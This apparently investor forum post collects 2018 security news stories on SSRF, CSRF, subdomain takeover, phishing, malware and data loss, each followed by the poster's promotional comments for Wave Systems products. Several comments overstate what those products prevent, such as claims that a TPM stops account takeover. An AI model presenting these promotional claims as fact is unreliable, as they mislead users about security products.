So, how does this apply to our times and solve the problem of tracking data in and across complex computing environments? All of the previous examples focus on the use of cryptographic erasure as an efficient way to destroy all content on a given physical storage medium. However, let's take a step back and get a better view of the general principle behind the idea.
Cryptographic Erasure: Two Useful Properties
First, unlike in the previous scenarios, we do not need to restrict ourselves to using a single key that encrypts an entire drive or data set. Instead, we can have as many unique keys as we need, encrypting data at the granularity that serves our purposes. For example, a cloud service provider may decide to assign a unique key for each of its customers, allowing it to selectively destroy a specific customer's data when necessary. Otherwise, the provider may choose to partition the data at a finer granularity — a unique key per user, file, or even a database entry. The possibilities and business applications are immense.
Second, cryptographic erasure entirely bypasses the issue of tracking data flows. Whether the data resides in a remote data center, in someone else's cloud, or in a long-forgotten tape archive is irrelevant. The encrypted data is always bound to the encryption key, and it is sufficient to know where our keys are to be able to destroy all instances of our data.
Unfortunately, there is no silver bullet in security, and this is not the exception. A prerequisite for this scheme to work is that all sensitive data must be encrypted at all times. (Maybe that is a good thing!) This implies a computational overhead for cryptographic operations, but more importantly, the decision to incorporate cryptographic erasure into a system is probably best considered at early architectural design stages. Integration into legacy systems may be difficult and error prone.
Furthermore, as with every cryptographic system, storage and distribution of keys becomes a prime concern, especially with very fine-grained data partitioning schemes that could require large numbers of keys. This would necessitate building an appropriate key management infrastructure — a task with which security professionals often have a love-hate relationship.
Cryptographic erasure is a powerful technique that can address emerging data destruction challenges, especially in the face of stringent privacy laws, where traditional approaches remain impractical. Security professionals should take advantage of this tool in their arsenal, understand its trade-offs, and recognize that cryptographic erasure can have advanced applications beyond wiping hard drives.
==================================================================
This article is another great reason for companies to have SEDs in their computer fleets!
==================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpt:
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
How Shopify Avoided a Data Breach, Thanks to a Bug Bounty
https://www.eweek.com/security/how-shopify-avoided-a-data-breach-thanks-to-a-bug-bounty
At KubeCon + CloudNativeCon NA 2018, Shopify and Google detail a Kubernetes security incident reported by a bug bounty security researcher that was quickly remediated before any harm was done.
Breaches occur on an-all-too-frequent basis, but what is often never reported are the breaches that don't happen, thanks to organizations taking rapid, proactive measures. One such incident was outlined by Shopify at KubeCon + CloudNativeCon NA 2018 last week.
Thanks to a bug bounty program and the support of its vendor partner Google, Shopify was able to avoid a potentially disastrous flaw that could have enabled an attacker to take over Shopify's Kubernetes cluster. Shopify provides an e-commerce platform that allows vendors to sell goods and services. The platform is hosted on the Google Kubernetes Engine (GKE), which provides a hosted version of the open-source Kubernetes container orchestration platform.
"If you're not familiar with Shopify, we've got about 600,000 businesses, so there's a good chance that you've purchased something from us without even realizing it," Shane Lawrence, security infrastructure engineer at Shopify, said. "We processed about $26 billion last year, and during peak hours we get approximately 80,000 requests per second."
Shopify runs entirely on GKE, said Lawrence; the reason his company chose Kubernetes is to be able to rapidly respond to scaling demands like the recent Black Friday and Cyber Monday shopping events.
"With Kubernetes we can scale down to a single replica if we need to test things, or we can scale up to hundreds across multiple geographical locations," Lawrence said. "It's important to us that our application developers spend their time developing applications, not becoming Kubernetes experts."
To that end, Shopify built a self-serve platform where organizations can literally go in and press the create cloud runtime button and in minutes have web applications serving traffic running on Kubernetes. The Shopify system uses guardrails to warn organizations if they're doing something that Shopify thinks might not be best practice or might not be secure.
Bug Bounty
While Shopify has done its best to make the platform as secure as it can be, flaws are an unavoidable part of modern software. To help identify unknown flaws, Shopify makes use of a managed bug bounty program on the HackerOne platform. With a bug bounty program, security researchers are rewarded for responsibly and privately disclosing flaws.
"We recognize that it would be infeasible to hire 300 people to sit around all day every day and test every single commit and try to find some vulnerabilities," Lawrence said. "So instead we just leverage the power of the community, and in doing so we've had over 300 hackers over the last three years or so participate in our [bug bounty] program."
Lawrence said that over the last three years, Shopify has paid out more than $1 million in bug bounties.
The Kubernetes Flaw
Regarding the specific Kubernetes cluster flaw that was detailed at KubeCon, Lawrence said the bug came in at 7:39 p.m. on a Sunday night from security researcher Andre Baptista. Eleven minutes later, at 7:50 p.m., Shopify's security response team declared that bug was in fact a security incident. At 8 p.m., Shopify's cloud security and app development teams were fully engaged on the issue, working on a fix.
Lawrence said that just over an hour after the report came in, Shopify's team made a code commit that disabled the vulnerable feature at 8:43 p.m. By 9:27 p.m., Shopify began the larger effort of investigating the full impact of the bug, cleaning up credentials and contacting Google to make sure nothing had been missed.
For his efforts, Shopify awarded Baptista a $25,000 reward.
SSRF
The security researcher was able to exploit a Server Side Request Forgery (SSRF) to obtain a Google service account token, as well as the Kube-env variable, which provided a Kubelet token, which in turn was used to gain full control of the cluster.
"SSRF is where you convince a web server to make a request on your behalf," Lawrence explained.
Lawrence said the Google service account and the metadata server that runs with it are used for interacting with other APIs in a cluster. The APIs assume that the token is also being used by other applications running in the same cloud platform, but not to end users, he said. By using the SSRF flaw, the researcher was able to convince the web server to send him the token directly.
Google
According to Greg Castle, Kubernetes security lead at Google, his company had already anticipated that type of attack. The problem was that Shopify was somehow making use of a beta version of the vulnerable API.
Castle said that there was a known issue with the beta API that was fixed when it became stable. The challenge is that many organizations, including Shopify, were using the beta API and had a dependency on it. Castle said that Google has since announced that it will be turning off the beta API by default when Kubernetes 1.12 becomes generally available on GKE. The researcher was also able to get access to Kubernetes metadata leading to the Kube-env variable. Castle said that GKE has an option to conceal metadata, which effectively puts a proxy in between the metadata server and the containers that are running on the machine.
"It filters out sensitive information like Kube-env, and it was actually specifically developed for exactly this style of attack," Castle said. "That [metadata concealment] was available at the time. Shopify had tried it out, but had some problems with it, so it wasn't actually running on the cluster that the security researcher had tried. If it had been, it would have prevented this attack."
Looking forward, Castle said Google doesn't want organizations to have to opt into security like metadata concealment. As such, the plan is to provide a new method to have each Kubelet bootstrap itself with a cryptographic assertion that comes from a trusted platform module (TPM).
"The idea is that it will be a better way to bootstrap the Kubelet in the future that will replace the static token and fix up this security weakness," he said.
Generally speaking, Castle suggested that Kubernetes users make sure that Kubernetes service accounts are configured for least privilege, only providing access and privileges for what is needed to function. He also recommended that Kubernetes users follow platform guidelines from their Kubernetes providers for hardening the system.
==================================================================
Wave ESC can manage the TPM! Someone once said that when TPMs began to have many uses, Wave would benefit greatly. Here is another use of the TPM where Wave can help. imo. Shopify could open up the market for the TPM!
==================================================================
Lax Controls Leave Fortune 500 Overexposed On the Net
https://www.darkreading.com/perimeter/lax-controls-leave-fortune-500-overexposed-on-the-net/d/d-id/1333497
The largest companies in the world have an average of 500 servers and devices accessible from the Internet - and many leave thousands of systems open to attack.
Large companies are leaving easy-to-exploit systems exposed on the public Internet, raising the risk of a serious future compromise, according to data from two cybersecurity firms.
Rapid7 found that the average Fortune 500 firm had approximately 500 servers and devices connected to the Internet, with five- to 10 systems exposing Windows file-sharing or Telnet services. Fifteen out of the 21 industry sectors on which Rapid7 collected data had at lease one member allowing public access to a Windows file-sharing service.
This simple-to-spot oversights suggest that companies do not have adequate control over what systems are connected to the public network, says Tod (CQ) Beardsley, research director of Rapid7, which published a report last week on its findings.
"I would advise everyone, from the Fortune 500 on down, to be aware of what you are exposing to the Internet," Beardsley says. "Any chance you have of taking something off the Internet—every device you take of the Internet is one less device for attackers to compromise."
The report refutes the common wisdom that larger companies, with their greater resources and more skilled security teams, are better defended against cyberattacks than smaller firms. While it's easy to assume that larger firms generally have more resources to allocate to cybersecurity, they also have many more devices connected to the Net, a sprawling infrastructure. and a greater attack surface area.
Both Rapid7's report and an earlier report by security monitoring firm BitSight found that larger firms were likely to have self-inflicted holes in their defenses.
"Bigger doesn't always mean better," says Jake Olcott, vice president of government affairs for BitSight. "Just because you are a large organization with lots of resources doesn't necessary mean that your security performance is better. In general, the larger the organization, the larger the attack surface."
The reports show that companies need to focus on three main areas to button up their systems and eliminate the security issues for which attackers are constantly on the lookout.
Know Your Assets
Rapid7 had little trouble identifying the various systems and devices connected to the Internet. On average, Fortune 500 companies had 500 systems connected to the public network: overall, large companies should consider that the baseline for the number of systems that should be exposed to the network. A significant fraction of technology, business-service and financial firms had thousands of exposed servers, Rapid7 found.
"When you are that far off of the norm, that tells me you have an asset management problem," Beardsley says. "It tells me that those companies are just littered with vulnerable systems connected to the Internet."
At least one company in each of the aerospace & defense, chemical, and retail industries had more than 20,000 systems accessible through the Internet, Rapid7 found.
Getting those assets under control is important. While many applications may warrant being connected to the Internet, the companies with greater than 1,000 connected systems are offering attackers a very enticing attack surface area.
Watch Outbound Traffic
Both Rapid7 and BitSight regularly see traffic generated by compromised systems coming from Internet addresses assigned to large companies. Rapid7, for example, found that the healthcare, retail, and technology sectors all had a high incidence of malicious traffic coming from their networks.
In its 2017 report, How Secure Are America’s Largest Business Partners?, BitSight found that 15% of companies produced traffic suggesting a compromise by Conficker, malware that is almost a decade old. Other infections included Necurs, Bedep, and Zeus. "Many organizations are not aware of these issues inside their networks," BitSight's Olcott says. "The traffic is absolutely an indicator that there is something bad happening."
It's not clear from the traffic data whether companies are having trouble eradicating malware or if they just don't know about a system harboring malicious code, he says.
"It could be a governance issue or a technology issue, or it might be an employee-training and awareness issue," Olcott says. "The root cause — the challenge that these organizations have is it is very hard for them to get visibility into their environments."
Eliminate Easy-to-Exploit Services
For modern companies, there is no reason to expose either Windows file-sharing, Telnet, or file-transfer protocol (FTP) services to the public network. Yet, at least a third of companies are hosting serveers with one of those services available, according to BitSight data.
Exposing Windows file-sharing through the SMB protocol opens up companies to debilitating attacks such as WannaCry, NotPetya, and other ransomware. Companies in at least 15 of the 21 sectors monitored by Rapid7 have servers with Windows file-sharing available through the public network. And more than 48 companies of the Fortune 500 have Telnet exposed on the Net, the company says.
"If you can get rid of all of the Internet-facing Telnet and SMB, you are miles ahead of the rest of the Internet, and you will avoid contributing to the next WannaCry," Rapid7's Beardsley says.
================================================================
The Wave Alternative could help prevent the potential problems arising in the above article without having to take the device off of the Internet. See excerpts below.
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
https://www.wavesys.com/wave-alternative
Excerpts:
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Cyber Readiness Institute want to help small firms fix their authentication
https://www.cyberscoop.com/cyber-readiness-institute-supply-chain-cybersecurity-guide/
Help is on the way for leaders at small and medium-sized businesses that have had to contend with cyberthreats that would be a challenge even for massive firms with multimillion-dollar security budgets.
A program led by alumni of President Barack Obama’s cybersecurity commission was unveiled Monday, offering free tools and resources meant to help smaller companies better secure their corporate networks. The Cyber Readiness Institute was launched in July 2017 by the Center for Global Enterprise — an institution devoted to researching management practices, — to help small and medium-sized enterprises mitigate cyber risk. The Cyber Readiness Program, which launched Monday, includes support from private sector heavyweights like Mastercard, Microsoft, ExxonMobil and General Motors.
The plan is for Fortune 500 companies to pass down cybersecurity know-how to companies with only a fraction of the resources, a method that ultimately aims to stop hackers before they can use one company as a foothold to its partners.
“Small businesses very often are the source of data breaches into large companies because of the supply chain effect,” Mastercard CEO Ajay Banga said at a press conference in Washington on Monday. “What’s coming at them is a cyberthreat that doesn’t distinguish between large and small. … This is not a problem for small businesses. It’s a problem for all of us, collectively.”
The nonprofit initiative led by Kiersten Todt, who was executive director of Obama’s cybersecurity commission, has been in the works for more than a year. The guidance released Monday gives tips for businesses on how to improve authentication, best password practices and integrate effective patching techniques, three areas where the Obama commission determined smaller companies struggle.
“Almost all the breaches in the U.S. from the past 10 years are sourced from authentication issues,” she said, adding later that CRI also encourages firms to implement security into their office culture.
“It starts with identifying a person who will be responsible for this in your company,” said Todt, who is the institute’s managing director. “[We] provide policy templates for your organization and … are creating communication and posters you need to internalize this.”
The CRI tools are based on pilot programs with 19 companies ranging in size from just a handful of employees to roughly 800, said former IBM CEO Sam Palmisano, a CRI co-chair. The program is intended to be only the first round of guidance, with additions to come as more enterprises get involved and provide feedback, he said.
Next steps include possible collaboration with the Department of Homeland Security and Grant Schneider, the federal chief information security officer, to help raise awareness about supply chain security.
But this project only is the beginning of a longer process. A number of well-publicized hacks, including the breach this year at Saks Fifth Avenue and the 2013 Target hack, occurred because thieves exploited outside software. Yet only 16 percent of companies surveyed as part of a Ponemon Institute study published in November say they are prepared to stop such incidents.
“I just want you all to understand this is going to be really hard,” Banga said. “Think of this as a three or four year effort to change the dialogue between small businesses and the rest of the industry to get things to improve.”
=================================================================
It doesn't have to be that hard. A solution is already here (see link below). Helping these smaller companies with their authentication (Wave VSC 2.0) could benefit all companies as many smaller companies and bigger companies' technology are intertwined. Using better security at less than half the cost could help turn this three to four year effort into much less. imo. Someone like BS would need to lead ESW/Wave in marketing Wave VSC 2.0 to these small, medium and large companies. imo.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
U.S. Ballistic Missile Defense Systems Fail Cybersecurity Audit
https://www.bleepingcomputer.com/news/security/us-ballistic-missile-defense-systems-fail-cybersecurity-audit/
A U.S. Department of Defense Inspector General report released this week outlines the inadequate cybersecurity practices being used to protect the United States' ballistic missile defense systems (BMDS ).
Ballistic missile defense systems are used by the U.S.A. to counter short, medium, intermediate and long range ballistic missiles that target the United States of America. As these systems are controlled by computers and software, they are at risk for being targeted by state-sponsored attacks that attempt to gain control of the systems, damage them, or steal classified information & source code.
On March 14, 2014, the DoD Chief Information Officer stated that the DoD must implement National Institute of Standards and Technology (NIST) security controls to protect their systems, which includes BMDS.
In a heavily redacted report by the DoD, it has been shown that BMDS facilities have failed to utilize required security controls such as multifactor authentication, vulnerability assessment and mitigation, server rack security, protection of classified data stored on removable media, encrypting transmitted technical information, physical facility security such as cameras and sensors, and did not perform routine assessments to make sure that these safeguards were in place.
In one facility, users were allowed to use single-factor authentication (only username + password) for up to 14 days during account creation. The report showed that in many cases, users would continue to use just a username and password for well past 14 days. At another facility, the domain administrator never bothered to configure policies that prevent users from logging in if they are not using multifactor authentication. Finally, one facility was using a system that does not even support multifactor authentication.
Vulnerabilities were also not properly patched and secured at numerous facilities. For example, a March 2018 scan of vulnerabilities at one facility showed that vulnerabilities found in a Janaury 2018 scan were never fixed. Other facilities contained vulnerabilities that were discovered in 2013 and had not been patched when they had conducted an April 2018 vulnerability assessment.
The reports also states that facilities were not encrypting data that was being stored on removable devices or using systems that kept track of what data was being copied. Some facilities stated that they did not know they even needed to encrypt data on removable devices.
"In addition, officials did not encrypt data stored on removable media. The system owner for the [redacted] and the Information System Security Officer for [redacted] stated that their components did not encrypt data stored on removable media because the [redacted] did not require the use of encryption," stated the DoD report. "Although the [redacted] did not require data stored on removable media to be encrypted, system owners and Information System Security Officers have a responsibility to implement and enforce Federal and DoD cybersecurity policies and procedures for encrypting data stored on removable media. In May 2018, the [redacted] directed [redacted] to begin encrypting data stored on removable media using Federal Information Processing Standard 140-2 certified methods by October 9, 2018, as a condition to operate on the [redacted]."
In addition to computer and data security issues, there were physical security issues as well. There were instances of server racks not being locked, for four years a door was reporting that it was closed when in fact it was open, people gained unauthorized access simply by pulling open doors, and security cameras were not always installed at required locations.
The recommendations by the DoD Inspector General's office is what you would expect. Fix these problems and follow required federal requirements. Unfortunately, Chief Information Officers from various facilities did not respond to the draft report and the Inspector General's office has now asked the Director, Commanding General, Commander, and Chief Information Officers to comment on the final report by January 8, 2019.
==================================================================
If Wave VSC 2.0 has proven itself already with a 'significant security requirements' of government (see article below) shouldn't it be used for many other areas of government?!?! BS, SKS, GK, and MW and others could bring the protection of Wave VSC 2.0 to the government as it could be very beneficial to them. This article just shows glaringly what is at stake without a product like Wave VSC 2.0. imo. Wave VSC 2.0 - Better security at less than half the cost.
==================================================================
Wave Systems Announces First U.S. Federal Government Customer for Wave Virtual Smart Card 2.0
https://www.wavesys.com/buzz/pr/wave-systems-announces-first-us-federal-government-customer-wave-virtual-smart-card-2.0
Lee, MA -
October 2, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) marked an important sales milestone by announcing the first U.S. federal government customer for its Virtual Smart Card 2.0.
Since the Virtual Smart Card 2.0 became commercially available in late July 2014, Wave has entered into dozens of pilot deployments in multiple sectors, including healthcare, financial services, automotive, energy and utilities. However, today’s announcement marks the product’s first sale in the government sector.
“This is an important milestone for Wave,” said Bill Solms, CEO of Wave. “Wave Virtual Smart Card 2.0 has been purchased by a government agency with significant security requirements and one that requires redundant means of system authentication due to national security interests. This initial sale is modest compared to the addressable market within the Federal Government sector, but it is important to our strategy for marketing the Virtual Smart Card to address critical government infrastructure defense.”
“We believe that this sale, which was completed on a shorter sales cycle than we had anticipated, supports our view that customers are interested in the type of cyber security solution that Wave’s Virtual Smart Card 2.0 provides,” Solms added.
Wave Virtual Smart Card 2.0 is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7. It also supports Windows 8 and 8.1. Wave’s new solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, lower total cost of ownership, and a reduced risk of unauthorized use.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure PIN and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with TPM 1.2 or TPM 2.0
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Android Malware Steals from PayPal Accounts
https://www.infosecurity-magazine.com/news/android-malware-steals-from-paypal?utm_source=twitterfeed&utm_medium=twitter
What happens when you combine a remotely controlled banking Trojan with an abuse of Android Accessibility services? According to new research from ESET, you get an Android Trojan that steals money from PayPal accounts, even with 2FA on.
The malware reportedly disguises itself as a battery optimization tool, and threat actors distribute it via third-party apps. “After being launched, the malicious app terminates without offering any functionality and hides its icon. From then on, its functionality can be broken down into two main parts,” researchers wrote.
In a video recording, researchers demonstrated an attempt to steal money from a PayPal account after the user had logged into the app. While the researchers were analyzing the malware, the PayPal app attempted to send €1,000, which failed when the app requested that the user link a new card due to insufficient funds.
The malware also attempted to steal login credentials and used phishing screens in overlay attacks on Google Play, WhatsApp, Skype, Viber and Gmail. “The malware’s code contains strings claiming the victim’s phone has been locked for displaying child pornography and can be unlocked by sending an email to a specified address. Such claims are reminiscent of early mobile ransomware attacks, where the victims were scared into believing their devices were locked due to reputed police sanctions,” researchers wrote.
According to Will LaSala, director of security solutions, security evangelist, OneSpan, the attack against the PayPal app highlights the vulnerabilities of installing apps from unknown sources and demonstrates how easily an overlay attack can hijack a strong application.
“What is concerning is that this malware app can download other applications, so even though today’s attack is against PayPal, this attack could easily be repurposed to attack any other application on the users mobile device. What’s new for this malware is that it is not focused on phishing for the users credentials, although it appears to attempt to phish for the user’s credit card information, instead it attempts to directly attack the transaction by creating an instant money transfer to the attacker’s account.”
=================================================================
Wave was at one point testing authentication under NSTIC with Paypal using Android devices. Why not use Wave Knowd with android devices (Samsung) to have a better 2FA than what was done in the article?!?! Paypal could have better security for its customers and Samsung could have better security for its customers (see previous Samsung post)!! Wave must have already done extensive testing with Paypal and Samsung. imo.
=================================================================
Wave Knowd Introduces New Model for Internet Authentication Without Passwords
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Knowd ‘Trust Score’ Assures User Identity when Accessing Web Services
Lenovo tells Asia-Pacific staff: Work lappy with your unencrypted data on it has been nicked
https://www.theregister.co.uk/2018/12/11/lenovo_asia_pacific_staff_data_unencrypted_work_laptop_stolen/
That's thousands of employees' names, monthly salaries, bank details
Exclusive A corporate-issued laptop lifted from a Lenovo employee in Singapore contained a cornucopia of unencrypted payroll data on staff based in the Asia Pacific region, The Register can exclusively reveal.
Details of the massive screw-up reached us from Lenovo staffers, who are simply bewildered at the monumental mistake. Lenovo has sent letters of shame to its employees confessing the security snafu.
"We are writing to notify you that Lenovo has learned that one of our Singapore employees recently had the work laptop stolen on 10 September 2018," the letter from Lenovo HR and IT Security, dated 21 November, stated.
"Unfortunately, this laptop contained payroll information, including employee name, monthly salary amounts and bank account numbers for Asia Pacific employees and was not encrypted."
Lenovo employs more than 54,000 staff worldwide (PDF), the bulk of whom are in China.
The letter stated there is currently "no indication" that the sensitive employee data has been "used or compromised", and Lenovo said it is working with local police to "recover the stolen device".
In a nod to concerns that will have arisen from this lapse in security, Lenovo is "reviewing the work practices and control in this location to ensure similar incidents do not occur".
On hand with more wonderfully practical advice, after the stable doors were left swinging open, Lenovo told staff: "As a precaution, we recommend that all employees monitor bank accounts for any unusual activities. Be especially vigilant for possible phishing attacks and be sure to notify your financial institution right away if you notice any unusual transactions."
The letter concluded on a high note. "Lenovo takes the security of employee information very seriously. And while there is no indication any data has been compromised, please let us know if you have any questions."
The staff likely do. One told us the incident was "extremely concerning" but "somehow not surprising in any way. How on Earth did they let this data exist on a laptop that was not encrypted?"
The Register has asked Lenovo to comment. ®
==================================================================
If Lenovo had this lapse, it seems like there could be large numbers of other companies that find themselves in potentially the same situation. Time for companies to get the SED management product from Wave below and keep this from ever happening. imo.
==================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Nice phone account you have there – shame if something were to happen to it: Samsung fixes ID-theft flaws
https://www.theregister.co.uk/2018/12/10/samsung_patches_accountstealing_hole/
If Artem Moskowsky owes you money, it's a good time to ask
A recently patched set of flaws in Samsung's mobile site was leaving users open to account theft.
Bug-hunter Artem Moskowsky said the flaws he discovered, a since-patched trio of cross-site request forgery (CSFR) bugs, would have potentially allowed attackers to reset user passwords and take over accounts.
Moskowsky told The Register that the vulnerabilities were due to the way the Samsung.com account page handled security questions. When the user forgets their password, they can answer the security question to reset it.
Normally, the Samsung.com web application would check the "referer" header to make sure data requests only come from sites that are supposed to have access.
In this case, however, those checks are not properly run and any site can get that information. This would let the attacker snoop on user profiles, change information (such as user name), or even disable two-factor authentication and steal accounts by changing passwords.
"Due to the vulnerabilities it was possible to hack any account on account.samsung.com if the user goes to my page," Moskowsky explained.
"The hacker could get access to all the Samsung user services, private user information, to the cloud."
In one proof of concept, the researcher showed how an attack site could use the CSRF flaw to change the target's Samsung.com security question to one of the attacker's choosing. Armed with the new security question and its answer, the attacker would then use the "reset password" function to steal the target's Samsung account.
It turned out the situation was even worse than the researcher initially thought. Thinking there were only two CSRF vulnerabilites on the site, Moskowsky went to report the issue directly to Samsung – something that was also done through the Samsung.com website. While reporting the issue, he noticed a third bug, the one that would allow him to forcibly change security questions and answers.
"I first discovered two vulnerabilities. But then when I logged in to security.samsungmobile.com to check my report, I was redirected to the personal information editing page," Moskowsy explained.
"This page didn't look like a similar page on account.samsung.com. There was an additional 'secret question' field on it."
In total, three bugs were found and were rated medium, high, and critical, respectively. Moskowsky earned himself a payout of $13,300 for the find, a nice payout, but well short of the $20,000 he pocketed for spotting a major bug in Steam back in October.
Samsung did not respond to a request for comment on the matter. ®
=================================================================
If Samsung were using Wave software with a mobile TPM in its phones or with a TPM in its computers, flaws like the one that crop up in the article could be severely diminished in their impact. imo.
The TPM or mobile TPM (with the TEE) could be used as second factor of authentication with Wave's software and used by a preferred (or more secure) customer on Samsung's sites.
=================================================================
Wave Systems Signs 15-year License Agreement with Samsung
https://www.wavesys.com/buzz/news/wave-systems-signs-15-year-license-agreement-samsung
Security Week -
Wednesday, May 30, 2012 -
Wave Systems has signed a 15-year software license and distribution agreement with Samsung, enabling Samsung to bundle Wave’s EMBASSY Security Center (ESC) and TCG Software Stack (TSS) technology with devices that include a Trusted Platform Module (TPM), an industry standard security chip embedded in the motherboard of a computer or other electronic device.
In an SEC filing, Wave said it would receive a per-unit royalty based on Samsung’s sales of products that include its technology, but did not provide estimates in terms of expected revenue derived as a result.
Hackers bypassed Gmail & Yahoo’s 2FA to target US officials
https://www.hackread.com/hackers-bypassed-gmail-yahoos-2fa-to-target-us-officials/
The attack was carried out by Iran-backed charming kitten hackers and victims include dozens of US government officials.
Private emails of US sanctions officials and nuclear scientists have been breached by Iranian state-sponsored hackers. As per the data obtained by Certfa, a cybersecurity firm based in London, the hacking group Charming Kitten is responsible for the break-in, which took place in November 2018 perhaps, in response to the re-imposing of strict economic sanctions on Iran by the US president Donald Trump.
Reportedly, Charming Kitten is involved in a targeted security breach against top US officials, and obtained emails of over a dozen US Treasury officials, those involved in the nuclear deal assigned between Tehran and Washington, DC think tank employees, Arab atomic scientists, and prominent figures from Iranian civil society.
Interestingly, the hackers made the mistake of leaving one of their servers open to the internet and this is how their hit list was identified by Certfa. According to Certfa’s report, the phishing campaign is a large-scale one as it involves breaching of emails of eminent US government officials, journalists, and activists, etc.
The campaign is particularly noteworthy because of the use of a novel technique that helped the hackers bypass the 2FA authentication protections that Gmail and Yahoo Mail and similar other services offer. Hence, the incident highlights the risks associated with the reliance on one-time passwords or one-tap logins that 2FA supports specifically if the password is sent via SMS message on the mobile phone.
To launch the attack, hackers obtained detailed information about their targets and wrote spear-phishing emails designed precisely to meet the operational security level of their targets. A hidden image was part of every email, the purpose of which was to alert the hackers when the target viewed the email.
As soon as the target entered the password into the fake Yahoo or Gmail login page, the hackers immediately received the credentials in real-time and entered the same on the target’s real login page. If a target’s account was protected through 2FA, the hackers redirected the target to another page that asked for a one-time password.
Certfa researchers discovered a list of 77 Yahoo and Gmail addresses on the exposed server. However, this is merely a fraction of the total targets of Charming Kitten but it still remains unclear if the hacker group breached the email accounts of all their targets successfully.
One of the targets of Charming Kitten includes the American Enterprise Institute scholar Frederick Kagan, who told Associated Press in response to the attack that:
The attack also reinforces the fact that cyberespionage is very deeply embedded into the US-Iran relationship.
=================================================================
After reading this article, there should be a line waiting to beat down the Wave/ESW door for Wave VSC 2.0! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases ? Virtual Private Network (VPN)
? Local logon
? Remote logon
? Remote desktop access
? Intranet/Extranet
? Cloud applications
A critical bug in Microsoft left 400M accounts exposed
https://www.hackread.com/critical-bug-in-microsoft-left-400m-accounts-exposed/
A bug bounty hunter from India, Sahad Nk who works forSafetyDetective, a cybersecurity firm, has received a reward from Microsoft for uncovering and reporting a series of critical vulnerabilities in Microsoft accounts.
These vulnerabilities were present on users’ Microsoft accounts from MS Office files to Outlook emails. This means, all kinds of accounts (over 400 million) and all sorts of data was susceptible to hacking. The bugs, if chained together, would become the perfect attack vector for acquiring access to a user’s Microsoft account. All the attacker required was to compel the user to click on a link.
According to Sahad Nk’s blog post, a subdomain of Microsoft namely “success.office.com,” isn’t configured properly, which is why he was able to control it using a CNAME record. It is a canonical record that connects a domain to another domain. Using CNAME record, Sahad was able to locate the misconfigured subdomain and point it to his personal Azure instance to gain control of the subdomain and all the data that it received.
However, this isn’t a big issue for Microsoft; the real problem lies in the fact that Microsoft Office, Sway, and Store apps can be easily tricked into transferring their authenticated login tokens to the domain, which is in control of the attacker now, when a user logs in via Microsoft’s Live. The reason this happens is that a wildcard regex is used by vulnerable apps. This allows all the subdomains to be trusted, explained Aviva Zacks of SafetyDetective.
As soon as the victim clicks on a specially designed link, which the victim receives via email, he or she will log in using the Microsoft Live’s login system. When the victim enters the username, password, and the 2FA code (if enabled), an account access token will be generated to let the user logged in without needing to re-enter the login credentials.
If someone gets hold of this access token, it’s akin to obtaining the authentic user credentials. Hence, an attacker can easily break into the account without alerting the original owner of the account or even alarming Microsoft about unauthorized access.
The malicious link is designed in a way that it forces the Microsoft login system to transfer the account token to the controlled subdomain. In this case, the subdomain was controlled by Sahad however, if a malicious attacker was controlling it, it was possible to put a massive number of Microsoft accounts at risk. Most importantly, the malicious link appears authentic because the user is still entering through the legitimate Microsoft login system.
The bug was reported by Nk (who works for SafetyDetective) to Microsoft and the good news is that it has been fixed however the exact amount of bounty amount received by Nk is still unknown.
=================================================================
Prior to this bug being reported and for any other bug like it, Wave VSC 2.0 should be the better security the market is looking for since with it there doesn't need to be a 2FA code here, and the TPM present prevents a hacker from getting into the account. imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Upcoming Bill Would Lock Down Agencies' Internet-Connected Devices
https://www.nextgov.com/cybersecurity/2018/12/upcoming-bill-would-lock-down-agencies-internet-connected-devices/153304/
But agency chief information officers could make exceptions, according to the legislation.
A House lawmaker wants federal agencies to prioritize cybersecurity when buying internet-connected devices.
